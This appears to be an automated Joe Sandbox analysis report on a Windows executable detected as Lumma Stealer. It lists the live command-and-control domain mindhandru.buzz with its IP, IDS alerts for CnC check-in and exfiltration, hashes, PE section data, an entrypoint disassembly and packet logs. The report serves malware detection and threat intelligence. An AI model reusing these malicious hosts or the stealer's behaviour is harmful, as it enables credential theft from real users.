                                                https://mindhandru.buzz/cFLK1CiiNK.exe, 00000000.00000003.1480463995.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://mindhandru.buzz/kcFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.rootca1.amazontrust.com0:cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://mindhandru.buzz/picFLK1CiiNK.exe, 00000000.00000003.1424733515.000000000173D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brcFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://mindhandru.buzz/dcFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://mindhandru.buzz:443/apicFLK1CiiNK.exe, 00000000.00000002.1484422809.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480463995.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1442422069.0000000005D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.microcFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1324894763.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1401111547.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480579154.0000000001716000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgcFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://x1.c.lencr.org/0cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://x1.i.lencr.org/0cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://mindhandru.buzz/tscFLK1CiiNK.exe, 00000000.00000003.1424733515.000000000173D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ucFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9ecFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://mindhandru.buzz:443/apizcFLK1CiiNK.exe, 00000000.00000003.1480579154.000000000171F000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482554233.000000000171F000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgcFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://support.mozilla.org/products/firefoxgro.allcFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctacFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              172.67.165.185
                                                                                              		mindhandru.buzzUnited States
                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1581235
                                                                                              Start date and time:2024-12-27 08:55:45 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 5m 23s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:12
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:cFLK1CiiNK.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:a95fc73c07c7d57256de64b06e73a6cd.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                              EGA Information:Failed
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 0
                                                                                              • Number of non-executed functions: 3
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200, 52.149.20.212
                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target cFLK1CiiNK.exe, PID 3592 because there are no executed function
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              02:56:44API Interceptor8x Sleep call for process: cFLK1CiiNK.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              172.67.165.185ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                  7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                    oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                      zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                        U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                          ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                              r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  mindhandru.buzzZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUSZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101
                                                                                                                  oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.11.101

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185
                                                                                                                  C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.165.185

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  No created / dropped files found

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.948937301400228
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:cFLK1CiiNK.exe
                                                                                                                  File size:1'865'728 bytes
                                                                                                                  MD5:a95fc73c07c7d57256de64b06e73a6cd
                                                                                                                  SHA1:b5b823520691853414948ed9b962e3cf886b868c
                                                                                                                  SHA256:540319216f35894c8d8252208fb9d8aa9414f9805d7ce0bf3c674c0dfafedb4c
                                                                                                                  SHA512:04462857b8574fdc3ef84ff0b7842ee7c64d264c70c2a28c842edaed23f7cc4f15fb0efdfcdea2ec87248be1c1c2f1bc1392c7b49221808b95a3e54cbb1f24a0
                                                                                                                  SSDEEP:49152:dB3O3/EYz6z5Mhc1XpL9z9zQiK33c8ez0C/JIg5:Xa//6z5R9p8iKcb0kJT5
                                                                                                                  TLSH:5085330ACE963431D45837B00F3BA7D5EBB4B285A471CE7B4E2D926D91E2D1F261C06E
                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@...........................I.....<.....@.................................Y@..m..

                                                                                                                  File Icon

                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x899000
                                                                                                                  Entrypoint Section:.taggant
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:6
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:6
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:6
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp 00007F61291667CAh
                                                                                                                  orps xmm3, dqword ptr [eax+eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  jmp 00007F61291687C5h
                                                                                                                  add byte ptr [edi], al
                                                                                                                  or al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], dh
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  pop es
                                                                                                                  or al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [ecx], al
                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  adc byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add dword ptr [edx], ecx
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  0x10000x520000x264005979988333de7ea174ad531f5757dc7dFalse0.9995468239379085data7.980910308787284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  0x550000x2a50000x200435868c3196be88f7ddd00a3f81a3824unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  yrxjmqat0x2fa0000x19e0000x19d600b39228cd545d446f648b4aeb2daaef83False0.9950601942848503data7.954658612611576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  kamsbjdu0x4980000x10000x6009672194dd6cdaaa14adb4f663070ce08False0.5813802083333334data5.027106845563143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .taggant0x4990000x30000x220056e0dcac02e979998dc68af7bea90292False0.06008731617647059DOS executable (COM)0.7382855847721984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  kernel32.dlllstrcpy

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-27T08:56:44.521401+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749699172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:45.229985+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749699172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:45.229985+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749699172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:46.514354+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:47.295254+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749700172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:47.295254+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:49.148046+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:51.390512+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:53.681437+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:56.621880+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749715172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:57.398383+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749715172.67.165.185443TCP
                                                                                                                  2024-12-27T08:56:59.258103+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749723172.67.165.185443TCP
                                                                                                                  2024-12-27T08:57:03.029746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749736172.67.165.185443TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 27, 2024 08:56:43.213653088 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:43.213712931 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:43.213815928 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:43.217212915 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:43.217226028 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:44.521248102 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:44.521400928 CET49699443192.168.2.7172.67.165.185
